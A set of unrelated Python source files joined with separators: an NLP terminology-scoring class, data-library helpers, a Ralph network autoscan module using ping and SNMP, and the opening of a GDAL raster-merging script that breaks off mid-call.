var9 = True
##################
import keyword
print(keyword.kwlist)
################## |
#!/usr/bin/env python3
import math, nltk, logging, os
from Document import *
import TestData, Wordlist, Settings
import pickle
class Metric:
"""Metric contains all the functions necessary to score an RDG's terminology."""
def __init__(self, rdgDir, general, working_dir = '.',overwrite=False,rank_from_previous=False,background_cache_file='ranking.pkl', full_to_abbr = False):
# available metrics
global bck_cache_file
bck_cache_file = background_cache_file
self.metrics = {'DR':self._calDR, 'DC':self._calDC,
'DRDC':self._calDRDC, 'IDF':self._calIDF,
'TFIDF':self._calTFIDF, 'TokenDRDC':self._calTokenDRDC,
'TokenIDF':self._calTokenIDF, 'Entropy':self._calEntropy,
'KLDiv':self._calKLDiv, 'Weighted':self._calWeighted,
'TF':self._calTF}
# used for restoring ranking
# from previous
self.rankingmap = {}
# input files
self.genDocs = Document(overwrite=overwrite)
#for numBackDocs # updates by Y Gu 11/2018 for pkl file type compatibility
self.genDocsNum = 0
#filtfname = os.path.join(rdgDir, 'filter.save')
#filtfname = os.path.join(working_dir, '.filter.save')
# General document group is given as files in a directory
if rank_from_previous:
pass
elif type(general)== type(str()):
logging.debug('Loading general documents from '+general)
# gen = [Document(general+genFile) for genFile in os.listdir(general) if genFile[-4:]=='.txt']
gen = map(lambda x: Document(filename=x.strip(),overwrite=overwrite), open(general).readlines())
## note that the iterator only les us calculate this once
## this is OK because this is the initialization function
## other maps should be cast into lists
# we only need the sum for the general class
## python3 compatibility change
## TrueTdf updates by Y Gu 6/2018 (next 2 lines + 5 lines in for loop)
## Updated again by Y Gu 11/2018 for type compatibility
for iterator in gen:
self.genDocsNum += 1
for w in iterator.counts:
## print(2,w,iterator.counts[w]) ## 57 OK
self.genDocs.counts[w] += iterator.counts[w]
self.genDocs.token_counts[w] += 1 # updates by Y Gu 11/2018 for pkl file type compatibility
## input('pausing')
# for i in range(len(list(gen))):
# for w in gen[i].counts:
# self.genDocs.counts[w] += gen[i].counts[w]
# General document group is given as a corpus
else:
logging.debug('Loading from general corpus...')
# NGrams in lieu of NPs -- we are storing extra info
words = general.words()
logging.debug('Unigrams loading')
bigrams = nltk.bigrams(words)
logging.debug('Bigrams loading')
trigrams = nltk.trigrams(words)
logging.debug('Trigrams loading')
#filters = ['abbreviation', 'case', 'stem']
filters = Settings.getCorpusFilters()
logging.debug('Filtering unigrams')
for w in words:
for filt in filters:
# if filt == 'abbreviation':
# w = Filter.criteria[filt](w,full_to_abbr)
# ## Somewhat of a kludge, the more general approach
# ## would be to allow all filters to take multiple arguments.
# ## If these get expanded, that would be the way to go.
# else:
w = Filter.criteria[filt](w)
if w:
self.genDocs.counts[w] += 1
self.genDocs.token_counts[w] += 1
logging.debug('Filtering bigrams')
for gram in bigrams:
w = ' '.join(gram)
for filt in filters:
w = Filter.criteria[filt](w)
if w:
self.genDocs.counts[w] += 1
logging.debug('Filtering trigrams')
for gram in trigrams:
w = ' '.join(gram)
for filt in filters:
w = Filter.criteria[filt](w)
if w:
self.genDocs.counts[w] += 1
logging.debug('done')
# Related Document Group -- we need each document separately
logging.debug('Loading RDG from '+rdgDir+'...')
#self.rdgDocs = [Document(rdgDir+rdgFile) for rdgFile in os.listdir(rdgDir) if rdgFile[-4:]=='.txt']
self.rdgDocs = list (map(lambda x: Document(filename=x.strip(),overwrite=overwrite), open(rdgDir).readlines()))
## Python 3 compatibility -- rdgDocs needs to be a list and Python3 makes it an iterator
logging.debug('done')
def _getTermFreq(self, word):
"""Returns the term frequency in the rdgDocs"""
if not hasattr(self, '_TermFreq'):
self._TermFreq = {}
if word in self._TermFreq:
freq = self._TermFreq[word]
else:
freq = 0
## print(0,'Looking for',word)
for doc in self.rdgDocs:
## print(0,doc)
if word in doc.counts:
## print(1,word,doc.counts[word]) ## 57
freq += doc.counts[word]
self._TermFreq[word] = freq
return freq
def _getTermDocFreq(self, word):
"""Returns the document frequency of a term in the rdg"""
if not hasattr(self, '_TermDocFreq'):
self._TermDocFreq = {}
if word in self._TermDocFreq:
freq = self._TermDocFreq[word]
else:
freq = 0
for doc in self.rdgDocs:
if word in doc.counts:
freq += 1
self._TermDocFreq[word] = freq
return freq
def _calDR(self, word):
"""Returns the document relevance of a proposed term"""
if not hasattr(self, '_DR'):
self._DR = {}
## check map
if (word,'DR') in self.rankingmap:
DR = self.rankingmap[(word,'DR')]
elif word in self._DR:
DR = self._DR[word]
else:
posFreq = self._getTermFreq(word)
if word in self.genDocs.counts:
negFreq = self.genDocs.counts[word]
else:
negFreq = 0
if (negFreq+posFreq) !=0:
DR = posFreq*math.log(len(word)+2.0)/(negFreq+posFreq)
else:
DR = 0 ## AM july 2017 -- assuming 0/0 equals 0
self._DR[word] = DR
return DR
def _calDC(self, word):
"""Returns the document consensus of a proposed term"""
if not hasattr(self, '_DC'):
self._DC = {}
if (word,'DC') in self.rankingmap:
DC = self.rankingmap[(word,'DC')]
elif word in self._DC:
DC = self._DC[word]
else:
posFreq = self._getTermFreq(word)
DC = 0
for doc in self.rdgDocs:
if word in doc.counts:
if posFreq != 0:
ptd = doc.counts[word]/float(posFreq)
DC += ptd*math.log(1/ptd)
else:
ptd = 0
DC = 0 ## AM July 2017 -- assumes 0/0 = 0
self._DC[word] = DC
return DC
def _calDRDC(self, word):
"""Returns the document relevance-document consensus \
(DRDC) of a proposed term"""
if (word,'DRDC') in self.rankingmap:
return self.rankingmap[(word,'DRDC')]
else:
return self._calDR(word)*self._calDC(word)
# edit to calculate true IDF = log (numBackDocs/numBackDocs(t)) Y. Gu edit 6/2018
def _calTrueIDF(self,word):
# +1 in case the count is zero, add-one smoothing
#updates by Y Gu 11/2018 for pkl file type compatibility
return math.log((self.genDocsNum + 1)/(self.genDocs.token_counts[word] +1))
def _calIDF(self, word):
"""Returns the document relevance-inverse document frequency \
(DR-IDF) of a proposed term"""
if (word,'IDF') in self.rankingmap:
return self.rankingmap[(word,'IDF')]
else:
return self._calDR(word)/math.log(self._getTermDocFreq(word)+3.0)
def _calTF(self, word):
"""Returns the term frequency of a proposed term"""
#I ADDED THIS ONE FOR REFERENCE
return self._getTermFreq(word)
def _calTFIDF(self, word):
"""Returns the term frequency-inverse document frequency (TF-IDF) \
of a proposed term"""
if not hasattr(self, '_TFIDF'):
self._TFIDF = {}
if word in self._TFIDF:
TFIDF = self._TFIDF[word]
else:
maxFreq = 0
for doc in self.rdgDocs:
if word in doc.counts and doc.counts[word] > maxFreq:
maxFreq = doc.counts[word]
#edit to use true IDF instad of DR Y. Gu edit 6/2018
#TFIDF = self._calDR(word)*maxFreq
TFIDF = self._calTrueIDF(word)*maxFreq
self._TFIDF[word] = TFIDF
return TFIDF
def _calTokenDR(self, word):
"""Token frequency adjustment helper function"""
if not hasattr(self, '_TokenDR'):
self._TokenDR = {}
if word in self._TokenDR:
tokenDR = self._TokenDR[word]
else:
tokenDR = 0.0
tokens = word.split()
for t in tokens:
if not t.isdigit():
#the frequencies are based on pure word counts, not NP counts!
token_rel = 0.0
for doc in self.rdgDocs:
token_rel += doc.token_counts[t]
token_total = token_rel + self.genDocs.token_counts[t]
if token_total!=0: ## AM July 7 -- treating 0 divided by 0 as 0
## changed to !=0 from > 0 on July 10
tokenDR += token_rel/float(token_total)
if len(tokens) == 0:
tokenDR = 0 ## prevent divide by zero error 3/11/2019
else:
tokenDR /= len(tokens)
self._TokenDR[word] = tokenDR
return tokenDR
def _calTokenDRDC(self, word):
"""Returns the document relevance-document consensus (DRDC) of \
a proposed term, adjusted for token frquency"""
if (word,'TokenDRDC') in self.rankingmap:
return self.rankingmap[(word,'TokenDRDC')]
else:
return self._calDRDC(word)*self._calTokenDR(word)
def _calTokenIDF(self, word):
"""Returns the document relevance-inverse document frequency \
(DR-TokenIDF) of a proposed term, adjusted for token frequency"""
if (word,'TokenIDF') in self.rankingmap:
return self.rankingmap[(word,'TokenIDF')]
else:
return self._calIDF(word)*self._calTokenDR(word)
def _calEntropy(self, word):
"""Return the pseudo-entropy of a proposed term"""
#-sum(p*log(p)) = -sum((c/N)*log(c/N))
# = -sum((1/N)*c*(log(c)-log(N)))
# = -sum((1/N)*c*log(c)) + sum((1/N)*c*log(N))
# = -(1/N)sum(clog(c))+(log(N)/N)*sum(c)
# ~ -sum(clog(c)) + A*sum(c)
# ~ -sum(clog(c)) + A*N
# ~ -sum(clog(c)) + B
# ~ -sum(clog(c))
## # but flip sign since "most negative" here is actually most important
## #observations+1 to avoid log(0)
c = (self._getTermFreq(word) + 1)
return -c*math.log(c)
def _calKLDiv(self, word):
"""Return the pseudo-log relative entropy of a proposed term"""
#sum(log(p/q)*p)
# = sum(log((c1/N1)/(c2/N2))*(c1/N1))
# = sum(log(c1*N2/(c2*N1))*c1/N1)
# = sum((log(c1*N2)-log(c2*N1))*c1/N1)
# = sum((log(c1)+log(N2)-log(c2)-log(N1))c1/N1)
# = sum((log(c1)-log(c2))*c1/N1) + sum((log(N2)-log(N1))*cl/N1)
# = (1/N1)sum((log(c1)-log(c2))c1) + (1/N1)log(N2/N1)*sum(c1)
# = (1/N1)sum((log(c1)-log(c2))c1) + (1/N1)log(N2/N1)*N1
# = (1/N1)sum((log(c1)-log(c2))c1) + log(N2/N1)
# ~ sum((log(c1)-log(c2))*c1)
#q (c2) is gen, p (c1) is rdg
#observations+1 to avoid log(0)
c1 = self._getTermFreq(word) + 1
c2 = (self.genDocs.counts[word] + 1)
return (math.log(c1) - math.log(c2))*c1
def _calSectionPrior(self, word):
"""NOT CURRENTLY SUPPORTED"""
#CURRENTLY, THIS DOESN'T SUM TO ONE!!!!!
#priors = {'Acknowledgements':0.01, 'Conclusion':0.9, 'Background':0.9,
# 'Results':0.8, 'Methods':0.25, 'Authors\' contributions':0.1,
# 'Discussion':0.9, 'Introduction':0.9,
# 'Results and Discussion':0.8, 'Supplementary Material':0.1,
# 'Supporting Information':0.1}
#priors = {'Supplementary Material': 0.001}
p = 1.0
#for section in priors:
# found = False
# for doc in self.rdgDocs:
# for s in doc.sections:
# if s.title == section:
# if word in s.text:
# found = True
# break
# if found:
# break
# if found:
# p *= priors[section]
# else:
# p *= (1.0-priors[section])
#if p <= 0 or p >= 1:
# print p
#
#
#nominal = 0.4 #Nominal value
#p = nominal
#for doc in self.rdgDocs:
# for s in doc.sections:
# temp = 0.0
# if s.title in priors:
# if word in s.text:
# temp += priors[s.title]
# p+=temp
#p/=len(self.rdgDocs)
#if p > nominal:
# print p
return p
def setWordlistProbs(self, probs):
"""Input dictionary of probabilities for terms in wordlists.
Keys = 'patent', 'science', 'law', 'common', and 'medicine'."""
self.lstProbs = probs.copy()
def _calWordlistPrior(self, word):
## piece of Zak's code that is not used
lstfolder = './wordlists/'
lstfiles = [('patent', 'patents.lst'),('science', 'academic.lst'),
('law','idcourts.lst'), ('law', 'nycourts.lst'),
('law','uscourts.lst'), ('common', 'gsl.lst'),
('medicine','medical_roots.lst')]
if not hasattr(self, 'lstProbs'):
self.lstProbs = {'patent':0.75, 'science':0.25, 'law':0.25,
'common':0.01, 'medicine':0.75}
if not hasattr(self, 'wordlistdict'):
self.wordlistdict = {}
for item in lstfiles:
lst = Wordlist.load(lstfolder+item[1])
if item[0] in self.wordlistdict:
self.wordlistdict[item[0]] += lst
else:
self.wordlistdict[item[0]] = lst
for label in self.wordlistdict:
pattern = Wordlist.compile_lst(self.wordlistdict[label])
self.wordlistdict[label] = pattern
prior = 1.0
for label in self.wordlistdict:
## stems = Filter.unstem(word)
for s in [word]:
matches = Wordlist.patternFind(self.wordlistdict[label],w,False)
if matches:
prior *= lstProbs[label]
break
return prior
def setWeights(self, dictWeights):
"""Input dictionary of weights for weighted measurements.
Keys = 'DC', 'DR', 'DRDC', 'TokenDRDC', 'IDF', 'TFIDF', 'TokenIDF', 'Entropy', 'KLDiv'."""
self.weights = dictWeights.copy()
def _calWeighted(self, word):
"""Returns the weighted score of a word over several different metrics"""
ret = 0.0
try:
self.weights
except:
# self.weights = {'DC': -1.1, 'TokenIDF': 0.8, 'TokenDRDC': 0.8,
# 'TFIDF': 0.3, 'IDF': 0.1, 'DR': 0.2, 'DRDC': 0.2}
# self.weights = {'TFIDF': 0.4, 'KLDiv': 0.4, 'Entropy': 0.1,
# 'IDF': 0.6, 'TokenDRDC': 0.3, 'DR': 0.4,
# 'DC': -1.8, 'TokenIDF': 1.7, 'DRDC': 0.5}
# self.weights = {'DC': -2.0, 'TokenIDF': 0.8, 'TokenDRDC': 0.7,
# 'TFIDF': 0.3, 'IDF': 0.1, 'DR': 0.3,
# 'DRDC': 0.26,'KLDiv':0.01,'Entropy':0.04}
self.weights = Settings.getMetricWeights()
for measure in self.weights:
ret += self.weights[measure]*self.metrics[measure](word)
#ret *= self._calSectionPrior(word)
#ret *= self._calWordlistPrior(word)
return ret
def rankTerms(self, measure='DRDC', save=True):
"""Score the RDG, return list of (word, rank) tuples"""
ranking = []
ranking_map = {} # separate map to not impose
#fd = FreqDist()
#for d in self.rdgDocs:
# for w in d.counts.keys():
# fd[w] += d.counts[w]
#words = fd.keys()
logging.debug('Entering rankTerms, loading keys...')
words = set()
for d in self.rdgDocs:
words.update(d.counts.keys())
logging.debug('Done')
logging.debug('Measuring ranks...')
i = 0
for w in words:
i += 1
if i % 1000 == 0:
logging.debug('Measuring word '+str(i))
temp = self.metrics[measure](w)
for s in [w]:
## Filter.unstem(w): #include all word variants
ranking.append((s, temp))
if save:
#logging.error("Saving word: " + str(s) + " to ranking.pkl with measurement: " + measure + " and value: " + str(temp))
ranking_map[(s,measure)]=temp
#ranking.append((w, temp))
logging.debug('Done')
## # force ranks to be [0,1]
## minimum = min(map(lambda x: x[1], ranking)) #to enforce >= 0
## if minimum < 0:
## minimum = abs(minimum)
## else:
## minumum = 0.0
## # add a placeholder for unknown words
## ranking.append(('[UNK]', -minimum - 9e-11)) # smallest value: 1e-11 before normalization
## minimum += 1e-10 #to avoid rank of 0
## ranking = [(r[0], r[1]+minimum) for r in ranking]
## total = sum(map(lambda x: x[1], ranking))
## # save log(rank) to avoid floating point precision errors
## ranking = [(r[0], math.log(r[1],2)-math.log(total),2) for r in ranking]
logging.debug('Sorting...')
ranking.sort(key=lambda x: x[1], reverse=True)
#pickle.dump(ranking_map, open(bck_cache_file,'w'))
f = open(bck_cache_file, 'wb')
#pickle.dump(ranking_map,f,encoding="utf-8")
pickle.dump(ranking_map,f)
logging.debug('Done')
return ranking
def rankTermsFromPrevious(self, measure='DRDC'):
"""Score the RDG, return list of (word, rank) tuples"""
# we only need the sum for the general class
#self.rankingmap = pickle.load(open(bck_cache_file,'r'))
f = open(bck_cache_file, 'rb')
#self.rankingmap = pickle.load(f, encoding="utf-8")
self.rankingmap = pickle.load(f)
ranking = [] # this ranking is a local array, not the cached
#fd = FreqDist()
#for d in self.rdgDocs:
# for w in d.counts.keys():
# fd[w] += d.counts[w]
#words = fd.keys()
logging.debug('Entering rankTerms, loading keys...')
words = set()
for d in self.rdgDocs:
words.update(d.counts.keys())
logging.debug('Done')
logging.debug('Measuring ranks...')
i = 0
for w in words:
i += 1
if i % 1000 == 0:
logging.debug('Measuring word '+str(i))
temp = self.metrics[measure](w)
for s in [w]:
## Filter.unstem(w): #include all word variants
ranking.append((s, temp))
#ranking.append((w, temp))
#logging.debug('Done')
## # force ranks to be [0,1]
## minimum = min(map(lambda x: x[1], ranking)) #to enforce >= 0
## if minimum < 0:
## minimum = abs(minimum)
## else:
## minumum = 0.0
## # add a placeholder for unknown words
## ranking.append(('[UNK]', -minimum - 9e-11)) # smallest value: 1e-11 before normalization
## minimum += 1e-10 #to avoid rank of 0
## ranking = [(r[0], r[1]+minimum) for r in ranking]
## total = sum(map(lambda x: x[1], ranking))
## # save log(rank) to avoid floating point precision errors
## ranking = [(r[0], math.log(r[1],2)-math.log(total),2) for r in ranking]
logging.debug('Sorting...')
ranking.sort(key=lambda x: x[1], reverse=True)
#self.rankingmap.sort(key=lambda x: x[1], reverse=True)
logging.debug('Done')
return ranking
def rankFile(self, filename, measure='DRDC'):
"""Score a file rather than an entire RDG. NOT SUPPORTED!"""
ranking = []
d = Document(filename=filename,overwrite=overwrite)
for w in d.counts:
temp = self.metrics[measure](w)
for s in [w]:
## Filter.unstem(w):
ranking.append((s, temp))
## # force ranks to be [0,1]
## minimum = min(map(lambda x: x[1], ranking)) #to enforce >= 0
## if minimum < 0:
## minimum = abs(minimum)
## else:
## minumum = 0.0
## # add a placeholder for unknown words
## ranking.append(('[UNK]', -minimum - 9e-11)) # smallest value: 1e-11 before normalization
## minimum += 1e-10 #to avoid rank of 0
## ranking = [(r[0], r[1]+minimum) for r in ranking]
## total = sum(map(lambda x: x[1], ranking))
## # save log(rank) to avoid floating point precision errors
## ranking = [(r[0], math.log(r[1],2)-math.log(total),2) for r in ranking]
ranking.sort(key=lambda x: x[1], reverse=True)
return ranking
def rankWordList(self, filename, measure='DRDC'):
"""Score a word list stored in a file (one word per line)."""
ranking = []
words = []
f = open(filename)
for line in f:
w = line.strip()
if w != '':
words.append(w)
f.close()
## useStem = 'stem' in Settings.getDocumentFilters() #are words stemmed?
for w in words:
# if useStem:
# temp = self.metrics[measure](Filter.stem(w))
# #for s in Filter.unstem(w):
# # ranking.append((s, temp))
# else:
temp = self.metrics[measure](w)
ranking.append((w, temp))
## # force ranks to be [0,1]
## minimum = min(map(lambda x: x[1], ranking)) #to enforce >= 0
## if minimum < 0:
## minimum = abs(minimum)
## else:
## minumum = 0.0
## # add a placeholder for unknown words
## ranking.append(('[UNK]', -minimum - 9e-11)) # smallest value: 1e-11 before normalization
## minimum += 1e-10 #to avoid rank of 0
## ranking = [(r[0], r[1]+minimum) for r in ranking]
## total = sum(map(lambda x: x[1], ranking))
## # save log(rank) to avoid floating point precision errors
## ranking = [(r[0], math.log(r[1],2)-math.log(total),2) for r in ranking]
ranking.sort(key=lambda x: x[1], reverse=True)
return ranking
def scoreByRankSum(self, termfiles, measure='DRDC'):
"""Score a metric on a document against a premade list."""
terms = set()
filters = ['case']#['abbreviation', 'case', 'stem']
for f in termfiles:
temp = TestData.load(f)
for w in temp:
for filt in filters:
w = Filter.criteria[filt](w)
if w:
terms.add(w)
ranking = self.rankTerms(measure)
score = 0
for t in terms:
r = filter(lambda x: x[0]==t, ranking)
#print t + ': ' + str(r)
if r:
r = r[0]
score += ranking.index(r)
else:
score += len(ranking)+1
#print score
return score
def scoreByTop(self, termfiles, measure='DRDC', n=300):
"""Score a metric on a document against a premade list."""
terms = set()
filters = ['case'] #['abbreviation', 'case', 'stem']
for f in termfiles:
temp = TestData.load(f)
for w in temp:
for filt in filters:
w = Filter.criteria[filt](w)
if w:
terms.add(w)
ranking = self.rankTerms(measure)
score = 0
for t in terms:
r = filter(lambda x: x[0]==t, ranking[:n])
#print t + ': ' + str(r)
if r:
score += 1
#print score
return score
def _twiddleWeights(self, termfiles):
"""Use twiddle to find and return a dictionary of weights \
for use in weighted scoring. This method is VERY slow."""
self.weights = {'DR':0.5, 'DC':0.5, 'DRDC':0.5, 'IDF':0.5,
'TFIDF':0.5, 'TokenDRDC':0.5, 'TokenIDF':0.5,
'Entropy':0.5, 'KLDiv':0.5}
#self.weights = {'DR': 0.2, 'DC': -1.1, 'DRDC': 0.2, 'TokenDRDC': 0.8,
# 'TFIDF': 0.3, 'IDF': 0.1, 'TokenIDF': 0.8,
# 'Entropy':0.5, 'KLDiv':0.5}
for i in range(100):
for w in self.weights:
print(w, 1)
currweight = self.weights[w]
currscore = self.scoreByRankSum(termfiles, measure='Weighted')
print (w, 2)
self.weights[w] = currweight - 0.1
score = self.scoreByRankSum(termfiles, measure='Weighted')
print (w, 3)
if score < currscore:
continue
print (w, 4)
self.weights[w] = currweight + 0.1
score = self.scoreByRankSum(termfiles, measure='Weighted')
print (w, 5)
if score < currscore:
continue
print (w, 6)
self.weights[w] = currweight
print (w, 7)
print (self.weights)
return self.weights
def _EMWeights(testfolder, N=300):
"""Use EM to find and return a dictionary of weights for use in \
weighted scoring. Here we are minimizing the perplexity of a held out set."""
# Need to:
# 1) calculate probability distributions for each measure
# 2) import test set
# 3) set initial weights
# 4) set tolerance
# Loop until delta_w < tolerance:
# E: c_i = (1/N)SUM_j(w_i*q_i(NP_j)/SUM_n(w_n*q_n(NP_j)))
# M: w_i = c_i/SUM_n(c_n)
#---------------------------
# Which measures to use:
measures = ['TFIDF', 'IDF', 'TokenIDF', 'DRDC', 'TokenDRDC', 'KLDiv']
# Calculate term hypothesized probability distribution
print ('Calculating probabilities...',)
Probs={}
for measure in measures:
ranklist = metric.rankTerms(measure)
# hypothesized probability distribution
# (of NPs being members of the set of terminology):
Probs[measure] = {}
for item in ranklist:
Probs[measure][item[0]] = 2**item[1]
if Probs[measure][item[0]]==0.0:
raise('Rounding Error! P = 0.0')
print (measure+' ',)
print ('done')
# import test set
print ('Retrieving test set...',)
try:
self.testwords
except:
#backup Filter dictionaries, as loading new documents will change them
## backupstems = [Filter.stemdict, Filter.unstemdict]
### I don't think this code will ever actually be loaded
## Filter.stemdict = {}
## Filter.unstemdict = {}
temp = [Document(filename=testfolder+f,overwrite=overwrite) for f in os.listdir(testfolder) if f[-4:]=='.txt']
testwords = []
# for i in range(len(temp)):
# for w in temp[i].counts:
# testwords.extend(Filter.unstem(w))
# #restore Filter.stemdict
# Filter.stemdict, Filter.unstemdict = backupstems
print ('done')
# set initial weights
weight = {}
for measure in measures:
weight[measure] = 1.0/len(measures)
# set tolerance
tolerance = 1e-10
# E-M loop
print ('Optimizing weights...',)
delta = 1.0
weight_old = weight.copy()
while delta > tolerance:
#print 'Squared change in weight: '+str(delta)
#E:
c = {}
# go through measures
for j in weight:
c[j] = 0.0
# sum through lessor of N words or all of them
N = min(N, len(self.testwords))
for i in range(N):
NP = self.testwords[i]
if not NP in Probs[j]:
NP = '[UNK]'
numer = weight[j]*Probs[j][NP]
denom = 0.0
# sum through all the measures
for n in weight:
denom += weight[n]*Probs[n][NP]
c[j] += numer/denom
c[j] *= (1.0/N)
#M:
delta = 0.0
for j in weight:
weight_old[j] = weight[j]
weight[j] = c[j]/sum(c.values())
delta += (weight[j]-weight_old[j])**2
print ('done')
# set those weights
metric.setWeights(weight)
return weight
def findWeights(self, testfolder):
return _EMWeights(self, testfolder, 300)
|
#!/usr/bin/env python
"""
Questions: Asks for further explanations regarding its parent. (common property)
"""
__all__ = ['patch', '__doc__']
def patch(target):
""" These methods are appended to DBContent with type <modulename>"""
# it comes in fixed order: column: <order_position>
target.is_in_random_order = True
# PROPERTY OWNERSHIP
target.COMMON_PROPERTY_CONTENT = False
target.GIVEN_PROPERTY_CONTENT = True
target.PRIVATE_PROPERTY_CONTENT = False
pass
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 08 08:54:04 2014
@author: Brian Jacobowski <bjacobowski.dev@gmail.com>
"""
from blpapi.element import Element
from blpapi.schema import SchemaElementDefinition
def format_fld_name(fld_name):
"""Reformats input field name to match bloomberg's expected style,
uppercase with underscores, no spaces.
"""
if isinstance(fld_name, str):
rtn = fld_name.replace(' ', '_').upper()
elif isinstance(fld_name, (Element, SchemaElementDefinition)):
rtn = str(fld_name.name()).replace(' ', '_').upper()
else:
rtn = str(fld_name).replace(' ', '_').upper()
return rtn
def shape_list(list_in, shape):
rtn = list_in[:]
for x in reversed(shape):
args = [iter(rtn)] * x
rtn = map(list, zip(*args))
return rtn
|
"""NdArray/Tensor array extension in Arrowbic.
"""
from typing import Iterable, Optional, Type, TypeVar
import numpy as np
import pyarrow as pa
from arrowbic.core.base_extension_array import BaseExtensionArray
from arrowbic.core.base_extension_type import BaseExtensionType
from arrowbic.core.base_types import NdArrayGeneric
from arrowbic.core.extension_type_registry import ExtensionTypeRegistry, find_registry_extension_type
TItem = TypeVar("TItem")
TArray = TypeVar("TArray", bound="TensorArray")
class TensorArray(BaseExtensionArray[NdArrayGeneric]):
"""NdArray/Tensor extension array."""
@classmethod
def __arrowbic_ext_type_class__(cls) -> Type[BaseExtensionType]:
from .tensor_type import TensorType
return TensorType
def __arrowbic_getitem__(self, index: int) -> Optional[NdArrayGeneric]:
"""Arrowbic __getitem__ interface, to retrieve a single Numpy NdArray item in an array.
Args:
index: Index of the item to retrieve.
Returns:
Item (or None if null entry).
"""
raw_data = self.storage.field(0)[index]
if not raw_data.is_valid:
return None
# Slicing directly the raw Numpy data.
raw_values = self.storage.field(0).values.to_numpy(zero_copy_only=True)
raw_offsets = self.storage.field(0).offsets.to_numpy(zero_copy_only=True)
shape = self.storage.field(1)[index].as_py()
data = raw_values[raw_offsets[index] : raw_offsets[index + 1]].reshape(shape)
return data
@classmethod
def make_from_data_shape_arrays(
cls: Type[TArray],
data_arr: pa.ListArray,
shape_arr: pa.ListArray,
*,
mask: Optional[pa.BooleanArray] = None,
registry: Optional[ExtensionTypeRegistry] = None,
) -> TArray:
"""Build a Tensor extension array from raw data and shape Arrow arrays (as flat list).
Args:
data_arr: Flat data Arrow array.
shape_arr: Flat shape Arrow array.
mask: Optional boolean mask array.
registry: Optional Arrowbic registry to use.
Returns:
Tensor extension array.
"""
storage_arr = pa.StructArray.from_arrays([data_arr, shape_arr], ["data", "shape"], mask=mask)
ext_tensor_type = find_registry_extension_type(np.ndarray, storage_arr.type, registry=registry)
ext_tensor_arr = cls.from_storage(ext_tensor_type, storage_arr)
return ext_tensor_arr
@classmethod
def from_iterator(
cls: Type[TArray],
it_items: Iterable[Optional[TItem]],
/,
*,
size: Optional[int] = None,
registry: Optional[ExtensionTypeRegistry] = None,
) -> TArray:
"""Build the extension array from a Python item iterator.
Args:
it_items: Items Python iterable.
size: Optional size of the input iterable.
registry: Optional registry where to find the extension type.
Returns:
Extension array, with the proper data.
"""
return super().from_iterator(it_items, size=size, registry=registry) # type:ignore
@classmethod
def from_tensor(cls: Type[TArray], arr: NdArrayGeneric) -> TArray:
"""Build a tensor array from a single tensor, the first dimension being the array dimension.
Args:
arr: Data tensor (N0, N1, ...)
Returns:
Tensor array of length N0, with tensors of shape (N1, ...)
"""
arr = np.asarray(arr)
if arr.ndim < 2:
raise ValueError(f"Input Numpy array with too few dimensions: '{arr.shape}'.")
N = arr.shape[0]
item_shape = arr.shape[1:]
item_size = np.prod(item_shape)
# Data array.
data_values = pa.array(np.ravel(arr))
data_offsets = pa.array(np.arange(0, N * item_size + 1, item_size, dtype=np.int64))
data_arr = pa.ListArray.from_arrays(data_offsets, data_values)
# Shape array.
shape_arr = pa.array([item_shape] * N)
return cls.make_from_data_shape_arrays(data_arr, shape_arr)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import itertools
import datetime
import django_rq
from ralph.util.network import ping
from ralph.discovery.http import get_http_family
from ralph.discovery.models import IPAddress, Network
from ralph.scan.snmp import get_snmp
from ralph.scan.errors import NoQueueError
ADDRESS_GROUP_SIZE = 32
def _split_into_groups(iterable, group_size):
"""
>>> list(_split_into_groups(range(10), 2))
[[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]]
>>> list(_split_into_groups(range(10), 3))
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
"""
for g, group in itertools.groupby(
enumerate(iterable),
lambda items: items[0] // group_size
):
yield [item for (i, item) in group]
def autoscan_data_center(data_center):
"""Queues a scan of all scannable networks in the data center."""
for network in data_center.network_set.exclude(queue=None):
autoscan_network(network)
def autoscan_network(network):
"""Queues a scan of a whole network on the right worker."""
if not network.queue:
raise NoQueueError(
"No discovery queue defined for network {0}.".format(network),
)
queue_name = network.queue.name
queue = django_rq.get_queue(queue_name)
for group in _split_into_groups(
network.network.iterhosts(),
ADDRESS_GROUP_SIZE,
):
queue.enqueue_call(
func=_autoscan_group,
args=(group,),
timeout=60,
result_ttl=0,
)
network.last_scan = datetime.datetime.now()
network.save()
def autoscan_address(address):
"""Queues a scan of a single address on the right worker."""
try:
network = Network.from_ip(address)
except IndexError:
raise NoQueueError(
"Address {0} doesn't belong to any configured "
"network.".format(address),
)
if not network.queue:
raise NoQueueError(
"The network {0} has no discovery queue.".format(network),
)
queue_name = network.queue.name
queue = django_rq.get_queue(queue_name)
queue.enqueue_call(
func=_autoscan_group,
args=([address],),
timeout=60,
result_ttl=0,
)
def _autoscan_group(addresses):
"""This is the function that actually gets queued during autoscanning."""
for address in addresses:
_autoscan_address(address)
def _autoscan_address(address):
"""Autoscans a single address on the worker."""
try:
ipaddress = IPAddress.objects.get(address=address)
except IPAddress.DoesNotExist:
ipaddress = None
if ipaddress and ipaddress.is_buried:
return
pinged = ping(address)
if pinged:
if not ipaddress:
ipaddress, created = IPAddress.objects.get_or_create(
address=address,
)
ipaddress.http_family = get_http_family(ipaddress.address)
(
ipaddress.snmp_name,
ipaddress.snmp_community,
ipaddress.snmp_version,
) = get_snmp(ipaddress)
ipaddress.dead_ping_count = 0
ipaddress.save(update_last_seen=True)
else:
if ipaddress:
ipaddress.http_family = None
ipaddress.snmp_name = None
ipaddress.snmp_community = None
ipaddress.snmp_version = None
ipaddress.dead_ping_count += 1
ipaddress.save(update_last_seen=False)
|
import subprocess
from .utils import logging, cwd, run_process, data_types
logger = logging.getLogger(__name__)
data = cwd / '../../../inputs/meta_fb'
def build_vrt(name):
subprocess.run([
'gdalbuildvrt',
'-q',
data / f'hrsl_{name}/hrsl_{name}-latest.vrt',
*sorted((data / f'hrsl_{name}').rglob('*.tif')),
])
def merge_data(name):
(data / f'hrsl_{name}/v1').mkdir(parents=True, exist_ok=True)
(data / f'hrsl_{name}/v1.5').mkdir(parents=True, exist_ok=True)
for file in sorted((data / f'hrsl_{name}_original').rglob('*.tif*')):
subprocess.run([
'gdal_translate',
'-q',
'--config', 'GDAL_NUM_THREADS', 'ALL_CPUS',
'-co', 'TILED=YES',
'-co', 'BLOCKXSIZE=512',
